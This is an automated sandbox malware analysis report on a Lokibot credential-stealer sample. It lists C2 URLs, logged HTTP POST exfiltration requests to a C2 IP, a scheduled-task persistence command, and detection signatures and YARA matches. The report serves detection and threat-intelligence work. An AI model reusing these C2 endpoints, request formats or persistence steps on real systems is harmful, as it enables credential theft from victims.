Loading ...

Play interactive tourEdit tour

Windows Analysis Report 2CW1YLhNIS

Overview

General Information

Sample Name:2CW1YLhNIS (renamed file extension from none to exe)
Analysis ID:438541
MD5:76afce42f708e6a32dc9d0e52f9f0336
SHA1:d7a3d05c161bcfdafe6348d82672d011fc5b05cc
SHA256:9e658eb8027169730ef306e2e3b145dd71c9d9f569ce7dd7c8264a0dfc114d87
Tags:32exeLokitrojan
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2CW1YLhNIS.exe (PID: 5768 cmdline: 'C:\Users\user\Desktop\2CW1YLhNIS.exe' MD5: 76AFCE42F708E6A32DC9D0E52F9F0336)
    • schtasks.exe (PID: 2872 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 2212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 2CW1YLhNIS.exe (PID: 6172 cmdline: C:\Users\user\Desktop\2CW1YLhNIS.exe MD5: 76AFCE42F708E6A32DC9D0E52F9F0336)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/QQojJUjm8ByeT"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
          • 0x1727b:$des3: 68 03 66 00 00
          • 0x1b678:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
          • 0x1b744:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13e80:$s2: https://
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpackLoki_1Loki Payloadkevoreilly
                • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x13ffc:$a2: last_compatible_version
                Click to see the 15 entries

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus / Scanner detection for submitted sampleShow sources
                Source: 2CW1YLhNIS.exeAvira: detected
                Antivirus detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Roaming\UieOsrSocP.exeAvira: detection malicious, Label: HEUR/AGEN.1142734
                Found malware configurationShow sources
                Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/QQojJUjm8ByeT"]}
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Roaming\UieOsrSocP.exeReversingLabs: Detection: 26%
                Multi AV Scanner detection for submitted fileShow sources
                Source: 2CW1YLhNIS.exeReversingLabs: Detection: 26%
                Source: 2CW1YLhNIS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: 2CW1YLhNIS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49735 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49735 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49735 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49735 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49737 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49737 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49737 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49737 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49739 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49739 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49739 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49739 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49741 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49741 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49741 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49741 -> 63.141.228.141:80
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://63.141.228.141/32.php/QQojJUjm8ByeT
                Source: Joe Sandbox ViewIP Address: 63.141.228.141 63.141.228.141
                Source: Joe Sandbox ViewASN Name: NOCIXUS NOCIXUS
                Source: global trafficHTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C18574AAContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C18574AAContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C18574AAContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C18574AAContent-Length: 163Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00404ED4 recv,
                Source: unknownHTTP traffic detected: POST /32.php/QQojJUjm8ByeT HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C18574AAContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Jun 2021 16:23:10 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2
                Source: 2CW1YLhNIS.exe, 00000004.00000002.660280673.000000000049F000.00000040.00000001.sdmpString found in binary or memory: http://63.141.228.141/32.php/QQojJUjm8ByeT
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649270975.0000000002D11000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 2CW1YLhNIS.exe, 2CW1YLhNIS.exe, 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                Source: 2CW1YLhNIS.exe, 00000000.00000002.648771695.0000000001100000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_008F5EC6
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_008F21B8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_008F4B40
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_02B7F640
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_02B7F952
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_02B7F6E1
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_02B79890
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_0534ED2E
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_053468A4
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_0534E8F0
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_0534A210
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_0534E8E0
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FAD4E0
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FAA4B5
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FAA450
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA8608
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA93C0
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FAA238
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA8D20
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA1E10
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FABA91
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA85F8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA0570
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA0561
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA17B8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA17A8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA9750
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA9740
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA4668
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA465A
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA4180
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA4172
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA93B1
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA32A8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA326D
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA3237
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FAA228
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA8D0F
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA1C30
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA1C20
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA9E60
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA9E51
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA1E01
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA19D8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA19C8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA38E0
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 0_2_05FA3898
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_0040549C
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_004029D4
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00C921B8
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00C95EC6
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00C94B40
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: String function: 00405B6F appears 42 times
                Source: 2CW1YLhNIS.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: UieOsrSocP.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: 2CW1YLhNIS.exe, 00000000.00000002.648771695.0000000001100000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exe, 00000000.00000002.655077709.000000000BE80000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exe, 00000000.00000002.648342673.0000000000A0C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSearchData.exe< vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649406564.0000000002DEF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRelativeFileUrl.dllL vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exe, 00000000.00000002.654647019.00000000061C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSparselyPopulated.dll@ vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exe, 00000000.00000002.655249744.000000000BF80000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exe, 00000000.00000002.655249744.000000000BF80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exe, 00000004.00000000.647583868.0000000000DAC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSearchData.exe< vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exeBinary or memory string: OriginalFilenameSearchData.exe< vs 2CW1YLhNIS.exe
                Source: 2CW1YLhNIS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
